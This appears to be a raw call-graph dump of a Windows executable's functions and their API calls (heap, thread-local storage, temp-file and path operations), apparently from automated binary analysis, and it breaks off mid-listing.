14000466c 8857->8858 10714 1400121c0 GetLastError TlsGetValue SetLastError 8858->10714 8860 140004676 10715 1400121c0 GetLastError TlsGetValue SetLastError 8860->10715 8862 140004686 8863 140005794 69 API calls 8862->8863 8864 1400046a0 8863->8864 8865 140012210 3 API calls 8864->8865 8866 1400046af PathAddBackslashW 8865->8866 10716 1400121c0 GetLastError TlsGetValue SetLastError 8866->10716 8868 1400046c3 10717 1400121c0 GetLastError TlsGetValue SetLastError 8868->10717 8870 1400046e0 8871 140012450 4 API calls 8870->8871 8872 1400046ef 8871->8872 8873 140012450 4 API calls 8872->8873 8874 140004703 8873->8874 10718 1400125d0 TlsGetValue 8874->10718 8876 14000470d 8877 14000309a 14 API calls 8876->8877 8878 140004720 8877->8878 10719 1400121c0 GetLastError TlsGetValue SetLastError 8878->10719 8880 140004743 8881 140012450 4 API calls 8880->8881 8882 140004752 8881->8882 8883 140012210 3 API calls 8882->8883 8884 140004763 PathRemoveBackslashW 8883->8884 8885 140003ddc 114 API calls 8884->8885 8885->8818 8896->8359 8897->8362 8899 14000cd04 HeapAlloc 8898->8899 8900 14000ce39 8898->8900 8899->8375 8899->8376 8923 14000d140 8900->8923 8902 14000ce4b 8930 140011968 8902->8930 8905 14000ce83 HeapFree 8905->8905 8906 14000ce9d HeapFree 8905->8906 8906->8899 8908 14001182b 8907->8908 8909 140011903 HeapAlloc 8908->8909 8910 14001183b 8908->8910 8911 14000cd9e HeapAlloc 8909->8911 8912 140011920 8909->8912 8959 140011ab8 LoadLibraryW 8910->8959 8911->8376 8914 140011942 8912->8914 8915 140011947 InitializeCriticalSection 8912->8915 8914->8911 8915->8911 8917 140011883 HeapAlloc 8918 1400118f4 LeaveCriticalSection 8917->8918 8919 14001189e 8917->8919 8918->8911 8921 1400117fc 4 API calls 8919->8921 8920 140011862 8920->8917 8920->8918 8922 1400118b7 8921->8922 8922->8918 8924 14000d15b 8923->8924 8925 14000d1b4 memset 8924->8925 8926 14000d163 HeapFree 8924->8926 8929 140016bb0 HeapFree 8924->8929 8943 1400116f4 8924->8943 8927 14000d1d0 8925->8927 8926->8924 8927->8902 8929->8924 8931 1400119fc 8930->8931 8932 14001197e EnterCriticalSection 8930->8932 8950 140011668 8931->8950 8934 14001199c 8932->8934 8935 1400119ed LeaveCriticalSection 8932->8935 8938 140011968 4 API calls 8934->8938 8936 14000ce54 HeapFree HeapFree 8935->8936 8936->8905 8936->8906 8941 1400119a9 HeapFree 8938->8941 8939 140011a11 HeapFree 8939->8936 8940 140011a07 DeleteCriticalSection 8940->8939 8941->8935 8944 14001170a EnterCriticalSection 8943->8944 8947 140011714 8943->8947 8944->8947 8945 1400117f1 8945->8924 8946 1400117e7 LeaveCriticalSection 8946->8945 8948 140011794 8947->8948 8949 14001177b HeapFree 8947->8949 8948->8945 8948->8946 8949->8948 8951 140011685 8950->8951 8952 14001167b EnterCriticalSection 8950->8952 8953 1400116a8 8951->8953 8954 14001168e HeapFree 8951->8954 8952->8951 8955 1400116ca 8953->8955 8956 1400116b0 HeapFree 8953->8956 8954->8953 8954->8954 8957 1400116e8 8955->8957 8958 1400116de LeaveCriticalSection 8955->8958 8956->8955 8956->8956 8957->8939 8957->8940 8958->8957 8960 140011aeb GetProcAddress 8959->8960 8962 140011b24 8959->8962 8961 140011b17 FreeLibrary 8960->8961 8963 140011b00 8960->8963 8961->8962 8964 14001184e EnterCriticalSection 8961->8964 8962->8964 8965 140011b38 Sleep 8962->8965 8963->8961 8964->8920 8965->8962 8967 14000d656 8966->8967 8968 14000d62f 8966->8968 8969 14000d53f 8967->8969 8970 1400116f4 3 API calls 8967->8970 8968->8969 8971 140016bb0 HeapFree 8968->8971 8972 1400116f4 3 API calls 8968->8972 8969->8386 8970->8967 8971->8968 8972->8968 8974 1400123ed 8973->8974 8975 14001240f TlsGetValue 8973->8975 8978 140012060 5 API calls 8974->8978 8976 140012440 8975->8976 8977 140012420 8975->8977 8976->8407 9013 140012c50 HeapAlloc HeapAlloc TlsSetValue 8977->9013 8980 1400123f2 TlsGetValue 8978->8980 9004 140016fb4 8980->9004 8981 140012425 TlsGetValue 8983 140016fb4 13 API calls 8981->8983 8983->8976 8985->8409 8986->8411 8987->8413 8988->8415 9014 140010db0 8989->9014 8992 1400125d0 TlsGetValue 8992->8419 8994 140007dde 8993->8994 9028 140012630 TlsGetValue 8994->9028 8997 1400126d0 3 API calls 8998 140007df4 8997->8998 8999 140007e02 8998->8999 9030 140012850 TlsGetValue 8998->9030 9001 14000431d 8999->9001 9002 140007e21 CharUpperW 8999->9002 9003 1400125a0 TlsGetValue 9001->9003 9002->9001 9003->8423 9005 140016fe2 TlsAlloc InitializeCriticalSection 9004->9005 9006 140017001 TlsGetValue 9004->9006 9005->9006 9007 1400170d6 HeapAlloc 9006->9007 9008 140017019 HeapAlloc 9006->9008 9009 14001240d 9007->9009 9008->9009 9010 140017039 EnterCriticalSection 9008->9010 9009->8976 9011 140017051 7 API calls 9010->9011 9012 14001704e 9010->9012 9011->9007 9012->9011 9013->8981 9015 140010ddc 9014->9015 9018 140010f00 9015->9018 9019 140010f1e 9018->9019 9022 1400126d0 TlsGetValue 9019->9022 9023 1400126f4 9022->9023 9024 140012772 9023->9024 9025 14001272d HeapReAlloc 9023->9025 9026 140004300 9024->9026 9027 140012793 HeapReAlloc 9024->9027 9025->9026 9026->8992 9027->9026 9029 140007de9 9028->9029 9029->8997 9030->8999 9031->8432 9032->8434 9033->8436 9035 1400126d0 3 API calls 9034->9035 9036 14000c0e6 GetModuleFileNameW 9035->9036 9037 14000c10d 9036->9037 9091 140012900 TlsGetValue 9037->9091 9039 14000224b 9040 1400125d0 TlsGetValue 9039->9040 9040->8460 9041->8450 9042->8455 9043->8458 9044->8462 9045->8464 9046->8467 9048 140007d10 9047->9048 9048->9048 9049 140012630 TlsGetValue 9048->9049 9050 140007d22 9049->9050 9051 1400126d0 3 API calls 9050->9051 9053 140007d2d 9051->9053 9052 140002427 9055 1400125d0 TlsGetValue 9052->9055 9053->9052 9092 140012850 TlsGetValue 9053->9092 9055->8472 9057 140010bb0 9056->9057 9061 140010c0c 9057->9061 9093 140017140 9057->9093 9058 140010f00 3 API calls 9059 140002446 9058->9059 9062 1400125d0 TlsGetValue 9059->9062 9061->9058 9062->8476 9063->8482 9065 140012477 9064->9065 9066 140012469 wcslen 9064->9066 9067 1400126d0 3 API calls 9065->9067 9066->9065 9068 140012485 9067->9068 9068->8484 9069->8488 9070->8490 9071->8492 9072->8494 9073->8498 9074->8504 9075->8506 9077 140007e75 9076->9077 9078 140012630 TlsGetValue 9077->9078 9079 140007e8e 9078->9079 9080 1400126d0 3 API calls 9079->9080 9081 140007e9a 9080->9081 9083 140007eaa 9081->9083 9099 140012850 TlsGetValue 9081->9099 9083->8508 9085 1400124d6 wcscmp 9084->9085 9087 14000257d 9085->9087 9087->8515 9088 14000c2bc 9087->9088 9100 140011044 TlsGetValue 9088->9100 9091->9039 9092->9052 9094 140017166 WideCharToMultiByte 9093->9094 9097 1400171f2 9093->9097 9096 1400171ae malloc 9094->9096 9094->9097 9096->9097 9098 1400171bf WideCharToMultiByte 9096->9098 9097->9061 9098->9097 9099->9083 9101 14000c2cc 9100->9101 9102 14001106a HeapAlloc TlsSetValue 9100->9102 9103 14001109c 9102->9103 9104 140016fb4 13 API calls 9103->9104 9104->9101 9106 1400126d0 3 API calls 9105->9106 9107 140007ca2 9106->9107 9107->8578 9108->8562 9109->8588 9110->8594 9112 1400123e0 21 API calls 9111->9112 9113 1400047fc 9112->9113 9114 1400122f0 2 API calls 9113->9114 9115 140004819 9114->9115 9116 1400122f0 2 API calls 9115->9116 9117 140004830 9116->9117 9899 1400121c0 GetLastError TlsGetValue SetLastError 9117->9899 9119 14000483e 9900 1400121c0 GetLastError TlsGetValue SetLastError 9119->9900 9121 140004852 9901 140008170 9121->9901 9124 140012210 3 API calls 9125 140004877 9124->9125 9904 1400121c0 GetLastError TlsGetValue SetLastError 9125->9904 9127 1400048a0 9128 140012450 4 API calls 9127->9128 9129 1400048af 9128->9129 9905 1400125a0 TlsGetValue 9129->9905 9131 1400048ba 9132 140012360 HeapFree 9131->9132 9133 1400048d9 9132->9133 9134 140012360 HeapFree 9133->9134 9135 1400048eb 9134->9135 9136 140012360 HeapFree 9135->9136 9137 1400048fd 9136->9137 9137->8598 9138->8603 9139->8605 9140->8607 9141->8609 9142->8613 9143->8619 9144->8621 9145->8623 9146->8625 9147->8629 9149 1400123e0 21 API calls 9148->9149 9150 14000414b 9149->9150 9151 1400122f0 2 API calls 9150->9151 9152 14000415e 9151->9152 9154 140004198 9152->9154 9906 14000350f 9152->9906 9155 140012360 HeapFree 9154->9155 9156 140004207 9155->9156 9157 1400121c0 GetLastError TlsGetValue SetLastError 9156->9157 9157->8637 9158->8639 9160 1400123e0 21 API calls 9159->9160 9161 140002c5e 9160->9161 9257 140003003 9161->9257 9909 1400121c0 GetLastError TlsGetValue SetLastError 9161->9909 9164 140002c95 9910 1400121c0 GetLastError TlsGetValue SetLastError 9164->9910 9165 14000301f 9167 140012450 4 API calls 9165->9167 9169 14000302e 9167->9169 9168 140002ca9 9911 1400121c0 GetLastError TlsGetValue SetLastError 9168->9911 10020 1400125a0 TlsGetValue 9169->10020 9172 140002cb9 9912 1400121c0 GetLastError TlsGetValue SetLastError 9172->9912 9173 140003039 9175 140012360 HeapFree 9173->9175 9177 140003058 9175->9177 9176 140002cc9 9913 14000ca80 9176->9913 9179 140012360 HeapFree 9177->9179 9181 14000306a 9179->9181 9180 140002cf1 9924 1400125d0 TlsGetValue 9180->9924 9183 140012360 HeapFree 9181->9183 9186 14000307c 9183->9186 9184 140002cfb 9925 140007ef0 9184->9925 9188 140012360 HeapFree 9186->9188 9190 14000308e 9188->9190 9189 140012210 3 API calls 9191 140002d1d 9189->9191 9190->8641 9933 1400121c0 GetLastError TlsGetValue SetLastError 9191->9933 9193 140002d27 9934 1400121c0 GetLastError TlsGetValue SetLastError 9193->9934 9195 140002d3b 9935 1400121c0 GetLastError TlsGetValue SetLastError 9195->9935 9197 140002d4b 9936 1400121c0 GetLastError TlsGetValue SetLastError 9197->9936 9199 140002d5b 9200 14000ca80 5 API calls 9199->9200 9201 140002d86 9200->9201 9937 1400125d0 TlsGetValue 9201->9937 9203 140002d90 9204 140007ef0 5 API calls 9203->9204 9205 140002da3 9204->9205 9206 140012210 3 API calls 9205->9206 9207 140002db2 9206->9207 9938 1400121c0 GetLastError TlsGetValue SetLastError 9207->9938 9209 140002dbc 9939 1400121c0 GetLastError TlsGetValue SetLastError 9209->9939 9211 140002dcc 9940 1400121c0 GetLastError TlsGetValue SetLastError 9211->9940 9213 140002dec 9941 1400121c0 GetLastError TlsGetValue SetLastError 9213->9941 9215 140002e00 9942 1400074e0 9215->9942 9217 140002e24 9957 140012520 TlsGetValue 9217->9957 9219 140002e2d 9958 1400121c0 GetLastError TlsGetValue SetLastError 9219->9958 9221 140002e37 9959 1400121c0 GetLastError TlsGetValue SetLastError 9221->9959 9223 140002e47 9224 1400074e0 9 API calls 9223->9224 9225 140002e6b 9224->9225 9960 1400125d0 TlsGetValue 9225->9960 9227 140002e75 9961 1400125d0 TlsGetValue 9227->9961 9229 140002e83 9962 14000b758 9229->9962 9231 140002e9b 9232 140012210 3 API calls 9231->9232 9233 140002eaa 9232->9233 9234 1400124c0 wcscmp 9233->9234 9235 140002eb7 9234->9235 9236 140003005 9235->9236 9237 140002ec0 9235->9237 9239 140002930 35 API calls 9236->9239 10002 1400121c0 GetLastError TlsGetValue SetLastError 9237->10002 9239->9257 9240 140002eca 10003 1400121c0 GetLastError TlsGetValue SetLastError 9240->10003 9242 140002ede 10004 1400121c0 GetLastError TlsGetValue SetLastError 9242->10004 9244 140002ef3 10005 1400121c0 GetLastError TlsGetValue SetLastError 9244->10005 9246 140002f07 9247 140007ef0 5 API calls 9246->9247 9248 140002f1c 9247->9248 10006 1400125d0 TlsGetValue 9248->10006 9250 140002f26 9251 140010ba0 6 API calls 9250->9251 9252 140002f3b 9251->9252 9253 140012210 3 API calls 9252->9253 9254 140002f4a 9253->9254 9255 1400124c0 wcscmp 9254->9255 9256 140002f59 9255->9256 9256->9257 10007 1400121c0 GetLastError TlsGetValue SetLastError 9256->10007 10019 1400121c0 GetLastError TlsGetValue SetLastError 9257->10019 9259 140002f6c 10008 1400121c0 GetLastError TlsGetValue SetLastError 9259->10008 9261 140002f85 10009 1400121c0 GetLastError TlsGetValue SetLastError 9261->10009 9263 140002f95 9264 1400074e0 9 API calls 9263->9264 9265 140002fb9 9264->9265 10010 140012520 TlsGetValue 9265->10010 9267 140002fc2 10011 1400125d0 TlsGetValue 9267->10011 9269 140002fce 10012 14000b574 9269->10012 9271 140002fe4 9272 140002930 35 API calls 9271->9272 9272->9257 9274 140001e60 9273->9274 9274->9274 9275 1400123e0 21 API calls 9274->9275 9278 140001e7a 9275->9278 9276 140001f54 10042 1400121c0 GetLastError TlsGetValue SetLastError 9276->10042 9277 1400121c0 GetLastError TlsGetValue SetLastError 9277->9278 9278->9276 9278->9277 9281 140007c90 3 API calls 9278->9281 9288 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 9278->9288 9293 140012210 TlsGetValue HeapAlloc HeapReAlloc 9278->9293 9280 140001f6e 10043 1400121c0 GetLastError TlsGetValue SetLastError 9280->10043 9281->9278 9283 140001f82 10044 14000d9c4 9283->10044 9286 140012210 3 API calls 9287 140001fa1 GetTempFileNameW 9286->9287 10053 1400121c0 GetLastError TlsGetValue SetLastError 9287->10053 9288->9278 9290 140001fce 10054 1400121c0 GetLastError TlsGetValue SetLastError 9290->10054 9292 140001fe2 10055 14000ca00 9292->10055 9293->9278 9296 140012210 3 API calls 9297 140002008 9296->9297 10061 14000da6c 9297->10061 9303 14000204f 10072 1400121c0 GetLastError TlsGetValue SetLastError 9303->10072 9305 140002063 9306 14000ca00 4 API calls 9305->9306 9307 140002078 9306->9307 9308 140012210 3 API calls 9307->9308 9309 140002089 9308->9309 9310 14000da6c 2 API calls 9309->9310 9311 140002095 9310->9311 9312 14000d914 3 API calls 9311->9312 9313 1400020a1 GetTempFileNameW PathAddBackslashW 9312->9313 10073 1400121c0 GetLastError TlsGetValue SetLastError 9313->10073 9315 1400020dc 10074 1400121c0 GetLastError TlsGetValue SetLastError 9315->10074 9317 1400020f0 9318 14000ca00 4 API calls 9317->9318 9319 140002105 9318->9319 9320 140012210 3 API calls 9319->9320 9321 140002116 9320->9321 9322 14000da6c 2 API calls 9321->9322 9323 140002122 PathRenameExtensionW GetTempFileNameW 9322->9323 10075 1400121c0 GetLastError TlsGetValue SetLastError 9323->10075 9325 140002162 10076 1400121c0 GetLastError TlsGetValue SetLastError 9325->10076 9327 140002176 9328 14000ca00 4 API calls 9327->9328 9329 14000218b 9328->9329 9330 140012210 3 API calls 9329->9330 9331 14000219c 9330->9331 9332 140012360 HeapFree 9331->9332 9333 1400021ba 9332->9333 9334 140012360 HeapFree 9333->9334 9335 1400021cc 9334->9335 9336 140012360 HeapFree 9335->9336 9337 1400021de 9336->9337 9338 1400067aa 9337->9338 9339 1400123e0 21 API calls 9338->9339 9356 1400067c2 9339->9356 9340 14000689c 10078 1400121c0 GetLastError TlsGetValue SetLastError 9340->10078 9342 1400068a6 10079 1400121c0 GetLastError TlsGetValue SetLastError 9342->10079 9344 1400068b6 9347 1400049ea 86 API calls 9344->9347 9345 140007c90 3 API calls 9345->9356 9346 140012210 TlsGetValue HeapAlloc HeapReAlloc 9346->9356 9348 1400068e8 9347->9348 9350 140012210 3 API calls 9348->9350 9349 1400121c0 GetLastError TlsGetValue SetLastError 9349->9356 9351 1400068f7 9350->9351 10080 14000dc88 9351->10080 9352 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 9352->9356 9355 140012360 HeapFree 9357 140006913 9355->9357 9356->9340 9356->9345 9356->9346 9356->9349 9356->9352 9358 140012360 HeapFree 9357->9358 9359 140006925 9358->9359 9360 140012360 HeapFree 9359->9360 9361 14000633a 9360->9361 9362 1400121c0 GetLastError TlsGetValue SetLastError 9361->9362 9362->8647 9363->8649 9365 1400123e0 21 API calls 9364->9365 9366 140004a05 9365->9366 9367 1400122f0 2 API calls 9366->9367 9368 140004a22 9367->9368 9369 140004a33 9368->9369 9370 140004a79 9368->9370 10085 1400121c0 GetLastError TlsGetValue SetLastError 9369->10085 9371 140004ac2 9370->9371 9372 140004a86 9370->9372 9375 140004b1b 9371->9375 9376 140004acf 9371->9376 10087 1400121c0 GetLastError TlsGetValue SetLastError 9372->10087 9379 140004b74 9375->9379 9380 140004b28 9375->9380 10088 1400121c0 GetLastError TlsGetValue SetLastError 9376->10088 9377 140004a3d 10086 1400121c0 GetLastError TlsGetValue SetLastError 9377->10086 9378 140004a97 9383 140012450 4 API calls 9378->9383 9387 140004b81 9379->9387 9388 140004bcd 9379->9388 10106 1400121c0 GetLastError TlsGetValue SetLastError 9380->10106 9390 140004aa6 9383->9390 9385 140004ad9 10089 1400121c0 GetLastError TlsGetValue SetLastError 9385->10089 9386 140004a4d 9395 14000daa8 5 API calls 9386->9395 10108 1400121c0 GetLastError TlsGetValue SetLastError 9387->10108 9392 140004c26 9388->9392 9393 140004bda 9388->9393 9399 140012210 3 API calls 9390->9399 9391 140004b32 10107 1400121c0 GetLastError TlsGetValue SetLastError 9391->10107 9397 140004c33 9392->9397 9398 140004c7f 9392->9398 10110 1400121c0 GetLastError TlsGetValue SetLastError 9393->10110 9403 140004a5d 9395->9403 9396 140004b8b 10109 1400121c0 GetLastError TlsGetValue SetLastError 9396->10109 10112 1400121c0 GetLastError TlsGetValue SetLastError 9397->10112 9410 140004cd8 9398->9410 9411 140004c8c 9398->9411 9413 140004a70 9399->9413 9402 140004ae9 10090 14000db18 9402->10090 9405 140012210 3 API calls 9403->9405 9405->9413 9408 140004b42 9418 14000db18 17 API calls 9408->9418 9409 140004be4 10111 1400121c0 GetLastError TlsGetValue SetLastError 9409->10111 9416 140004d31 9410->9416 9417 140004ce5 9410->9417 10114 1400121c0 GetLastError TlsGetValue SetLastError 9411->10114 10083 1400121c0 GetLastError TlsGetValue SetLastError 9413->10083 9414 140004b9b 9424 14000db18 17 API calls 9414->9424 9415 140004c3d 10113 1400121c0 GetLastError TlsGetValue SetLastError 9415->10113 9421 140004d8a 9416->9421 9422 140004d3e 9416->9422 10116 1400121c0 GetLastError TlsGetValue SetLastError 9417->10116 9428 140004b58 9418->9428 9437 140004e3a 9421->9437 9438 140004d9b 9421->9438 10118 1400121c0 GetLastError TlsGetValue SetLastError 9422->10118 9423 140012210 3 API calls 9491 140004b12 9423->9491 9433 140004bb1 9424->9433 9439 140012210 3 API calls 9428->9439 9429 140004bf4 9440 14000db18 17 API calls 9429->9440 9430 140004c96 10115 1400121c0 GetLastError TlsGetValue SetLastError 9430->10115 9443 140012210 3 API calls 9433->9443 9434 140004c4d 9444 14000db18 17 API calls 9434->9444 9435 140004e8b 9445 140012450 4 API calls 9435->9445 9436 140004cef 10117 1400121c0 GetLastError TlsGetValue SetLastError 9436->10117 10146 1400121c0 GetLastError TlsGetValue SetLastError 9437->10146 10120 1400121c0 GetLastError TlsGetValue SetLastError 9438->10120 9439->9491 9449 140004c0a 9440->9449 9441 140004ca6 9451 14000db18 17 API calls 9441->9451 9442 140004d48 10119 1400121c0 GetLastError TlsGetValue SetLastError 9442->10119 9443->9491 9453 140004c63 9444->9453 9454 140004e9a 9445->9454 9450 140012210 3 API calls 9449->9450 9450->9491 9459 140004cbc 9451->9459 9461 140012210 3 API calls 9453->9461 10084 1400125a0 TlsGetValue 9454->10084 9455 140004cff 9463 14000db18 17 API calls 9455->9463 9456 140004da5 10121 1400121c0 GetLastError TlsGetValue SetLastError 9456->10121 9457 140004e44 10147 1400121c0 GetLastError TlsGetValue SetLastError 9457->10147 9466 140012210 3 API calls 9459->9466 9460 140004d58 9467 14000db18 17 API calls 9460->9467 9461->9491 9469 140004d15 9463->9469 9465 140004e54 9472 14000daa8 5 API calls 9465->9472 9466->9491 9473 140004d6e 9467->9473 9468 140004ea5 9478 140012360 HeapFree 9468->9478 9474 140012210 3 API calls 9469->9474 9470 140004db5 10122 14000bc94 9470->10122 9476 140004e64 9472->9476 9477 140012210 3 API calls 9473->9477 9474->9491 9480 140012210 3 API calls 9476->9480 9477->9491 9481 140004ec4 9478->9481 9479 140012210 3 API calls 9483 140004dea 9479->9483 9480->9413 9482 140012360 HeapFree 9481->9482 9484 140004ed6 9482->9484 9485 1400124c0 wcscmp 9483->9485 9484->8652 9486 140004dff 9485->9486 9487 140004e21 9486->9487 9488 140004e08 9486->9488 9490 140002930 35 API calls 9487->9490 10143 140007364 9488->10143 9490->9491 9491->9413 9492->8656 9493->8658 9494->8660 9496 1400123e0 21 API calls 9495->9496 9497 140003cde 9496->9497 9498 1400122f0 2 API calls 9497->9498 9499 140003cfb 9498->9499 10156 1400121c0 GetLastError TlsGetValue SetLastError 9499->10156 9501 140003d2f 10157 1400121c0 GetLastError TlsGetValue SetLastError 9501->10157 9503 140003d43 9504 14000ca80 5 API calls 9503->9504 9505 140003d5f 9504->9505 9506 140012210 3 API calls 9505->9506 9507 140003d6e 9506->9507 10158 1400121c0 GetLastError TlsGetValue SetLastError 9507->10158 9509 140003d87 9510 140012450 4 API calls 9509->9510 9511 140003d96 9510->9511 10159 1400125a0 TlsGetValue 9511->10159 9513 140003da1 9514 140012360 HeapFree 9513->9514 9515 140003dc0 9514->9515 9516 140012360 HeapFree 9515->9516 9517 140003dd2 9516->9517 9518 140012520 TlsGetValue 9517->9518 9518->8664 9519->8666 9521 14000c468 SetEnvironmentVariableW 9520->9521 9522 14000c47c 9520->9522 9521->9522 9522->8668 9523->8670 9524->8678 9525->8680 9527 1400123e0 21 API calls 9526->9527 9528 1400026d1 9527->9528 10160 1400121c0 GetLastError TlsGetValue SetLastError 9528->10160 9530 1400026e5 10161 1400121c0 GetLastError TlsGetValue SetLastError 9530->10161 9532 1400026f9 9533 14000c0c4 5 API calls 9532->9533 9534 140002709 9533->9534 9535 140012210 3 API calls 9534->9535 9536 140002718 9535->9536 9537 1400027c0 9536->9537 9538 140002730 9536->9538 10227 1400121c0 GetLastError TlsGetValue SetLastError 9537->10227 10162 1400121c0 GetLastError TlsGetValue SetLastError 9538->10162 9541 14000273a 10163 1400121c0 GetLastError TlsGetValue SetLastError 9541->10163 9542 1400027cf 9543 140012450 4 API calls 9542->9543 9545 1400027de 9543->9545 9547 140012210 3 API calls 9545->9547 9546 14000274a 10164 1400031f5 9546->10164 9550 1400027be 9547->9550 10228 1400121c0 GetLastError TlsGetValue SetLastError 9550->10228 9551 140012210 3 API calls 9553 140002768 9551->9553 10226 1400121c0 GetLastError TlsGetValue SetLastError 9553->10226 9554 1400027fc 9556 140012450 4 API calls 9554->9556 9558 14000280b 9556->9558 9557 140002777 9559 140012450 4 API calls 9557->9559 10229 1400125a0 TlsGetValue 9558->10229 9561 140002786 9559->9561 9563 140012450 4 API calls 9561->9563 9562 140002816 9564 140012360 HeapFree 9562->9564 9565 14000279d 9563->9565 9566 140002835 9564->9566 9567 140012450 4 API calls 9565->9567 9568 140012360 HeapFree 9566->9568 9569 1400027af 9567->9569 9570 140002847 9568->9570 9571 140012210 3 API calls 9569->9571 9570->8683 9571->9550 9573 140004eeb 9572->9573 9573->9573 9574 1400123e0 21 API calls 9573->9574 9593 140004f05 9574->9593 9575 140004fdf 10253 1400121c0 GetLastError TlsGetValue SetLastError 9575->10253 9577 140004fe9 10254 1400121c0 GetLastError TlsGetValue SetLastError 9577->10254 9578 1400121c0 GetLastError TlsGetValue SetLastError 9578->9593 9580 140004ffd 10255 1400121c0 GetLastError TlsGetValue SetLastError 9580->10255 9581 140007c90 3 API calls 9581->9593 9583 14000500d 10256 1400121c0 GetLastError TlsGetValue SetLastError 9583->10256 9584 140012210 TlsGetValue HeapAlloc HeapReAlloc 9584->9593 9586 14000501d 9587 140010ba0 6 API calls 9586->9587 9588 14000503b 9587->9588 10257 1400125d0 TlsGetValue 9588->10257 9589 140012450 wcslen TlsGetValue HeapReAlloc HeapReAlloc 9589->9593 9591 140005045 9592 140007dc0 6 API calls 9591->9592 9594 140005058 9592->9594 9593->9575 9593->9578 9593->9581 9593->9584 9593->9589 9595 140012210 3 API calls 9594->9595 9596 140005067 9595->9596 10258 1400121c0 GetLastError TlsGetValue SetLastError 9596->10258 9598 140005071 10259 1400121c0 GetLastError TlsGetValue SetLastError 9598->10259 9600 140005085 10260 1400121c0 GetLastError TlsGetValue SetLastError 9600->10260 9602 140005095 10261 1400121c0 GetLastError TlsGetValue SetLastError 9602->10261 9604 1400050a5 9605 140010ba0 6 API calls 9604->9605 9606 1400050c3 9605->9606 10262 1400125d0 TlsGetValue 9606->10262 9608 1400050cd 9609 140007dc0 6 API calls 9608->9609 9610 1400050e0 9609->9610 9611 140012210 3 API calls 9610->9611 9612 1400050ef 9611->9612 10263 1400121c0 GetLastError TlsGetValue SetLastError 9612->10263 9614 1400050f9 10264 1400121c0 GetLastError TlsGetValue SetLastError 9614->10264 9616 14000510d 10265 1400121c0 GetLastError TlsGetValue SetLastError 9616->10265 9618 14000511d 10266 1400121c0 GetLastError TlsGetValue SetLastError 9618->10266 9620 14000512d 9621 140010ba0 6 API calls 9620->9621 9622 140005149 9621->9622 10267 1400125d0 TlsGetValue 9622->10267 9624 140005153 9625 140007dc0 6 API calls 9624->9625 9626 140005166 9625->9626 9627 140012210 3 API calls 9626->9627 9628 140005175 9627->9628 10268 1400121c0 GetLastError TlsGetValue SetLastError 9628->10268 9630 14000517f 10269 1400121c0 GetLastError TlsGetValue SetLastError 9630->10269 9632 140005193 10270 1400121c0 GetLastError TlsGetValue SetLastError 9632->10270 9634 1400051a3 10271 1400121c0 GetLastError TlsGetValue SetLastError 9634->10271 9636 1400051b3 9637 140010ba0 6 API calls 9636->9637 9638 1400051d2 9637->9638 10272 1400125d0 TlsGetValue 9638->10272 9640 1400051dc 9641 140007dc0 6 API calls 9640->9641 9642 1400051ef 9641->9642 9643 140012210 3 API calls 9642->9643 9644 1400051fe 9643->9644 10273 1400121c0 GetLastError TlsGetValue SetLastError 9644->10273 9646 140005208 10274 1400121c0 GetLastError TlsGetValue SetLastError 9646->10274 9648 14000521c 10275 1400121c0 GetLastError TlsGetValue SetLastError 9648->10275 9650 14000522c 10276 1400121c0 GetLastError TlsGetValue SetLastError 9650->10276 9652 14000523c 9653 140010ba0 6 API calls 9652->9653 9654 14000525b 9653->9654 10277 1400125d0 TlsGetValue 9654->10277 9656 140005265 9657 140007dc0 6 API calls 9656->9657 9658 140005278 9657->9658 9659 140012210 3 API calls 9658->9659 9660 140005287 9659->9660 10278 1400121c0 GetLastError TlsGetValue SetLastError 9660->10278 9662 140005291 10279 1400121c0 GetLastError TlsGetValue SetLastError 9662->10279 9664 1400052a1 10280 140005794 9664->10280 9666 1400052be 10313 1400121c0 GetLastError TlsGetValue SetLastError 9666->10313 9668 1400052dc 10314 1400121c0 GetLastError TlsGetValue SetLastError 9668->10314 9670 1400052ec 9671 140005794 69 API calls 9670->9671 9672 140005306 9671->9672 9673 140012210 3 API calls 9672->9673 9674 140005317 9673->9674 10315 1400121c0 GetLastError TlsGetValue SetLastError 9674->10315 9676 140005321 10316 1400121c0 GetLastError TlsGetValue SetLastError 9676->10316 9678 140005331 9679 140005794 69 API calls 9678->9679 9680 14000534b 9679->9680 9681 140012210 3 API calls 9680->9681 9682 14000535a 9681->9682 10317 1400121c0 GetLastError TlsGetValue SetLastError 9682->10317 9684 140005364 10318 1400121c0 GetLastError TlsGetValue SetLastError 9684->10318 9686 140005374 9687 140005794 69 API calls 9686->9687 9688 14000538e 9687->9688 9689 140012210 3 API calls 9688->9689 9690 1400053a0 9689->9690 10319 1400121c0 GetLastError TlsGetValue SetLastError 9690->10319 9692 1400053aa 10320 1400121c0 GetLastError TlsGetValue SetLastError 9692->10320 9694 1400053ba 9695 140005794 69 API calls 9694->9695 9696 1400053d4 9695->9696 9697 140012210 3 API calls 9696->9697 9698 1400053e6 9697->9698 10321 1400121c0 GetLastError TlsGetValue SetLastError 9698->10321 9700 1400053f0 10322 1400121c0 GetLastError TlsGetValue SetLastError 9700->10322 9702 140005404 10323 1400121c0 GetLastError TlsGetValue SetLastError 9702->10323 9704 140005414 10324 1400121c0 GetLastError TlsGetValue SetLastError 9704->10324 9706 140005428 9707 140003cc9 37 API calls 9706->9707 9708 14000543e 9707->9708 10325 140012520 TlsGetValue 9708->10325 9710 140005447 10326 1400125d0 TlsGetValue 9710->10326 9712 14000545f 10327 1400081d0 9712->10327 9715 140012210 3 API calls 9716 140005486 9715->9716 10330 1400121c0 GetLastError TlsGetValue SetLastError 9716->10330 9718 140005490 10331 1400121c0 GetLastError TlsGetValue SetLastError 9718->10331 9720 1400054a4 10332 1400121c0 GetLastError TlsGetValue SetLastError 9720->10332 9722 1400054b4 10333 1400121c0 GetLastError TlsGetValue SetLastError 9722->10333 9724 1400054c8 9725 140003cc9 37 API calls 9724->9725 9726 1400054de 9725->9726 10334 140012520 TlsGetValue 9726->10334 9728 1400054e7 10335 1400125d0 TlsGetValue 9728->10335 9730 1400054ff 9731 1400081d0 13 API calls 9730->9731 9732 140005517 9731->9732 9733 140012210 3 API calls 9732->9733 9734 140005526 9733->9734 10336 1400121c0 GetLastError TlsGetValue SetLastError 9734->10336 9736 140005530 10337 1400121c0 GetLastError TlsGetValue SetLastError 9736->10337 9738 140005549 9739 140012450 4 API calls 9738->9739 9740 140005558 9739->9740 9741 140012450 4 API calls 9740->9741 9742 14000556f 9741->9742 9743 140012450 4 API calls 9742->9743 9744 140005584 9743->9744 9745 140012450 4 API calls 9744->9745 9746 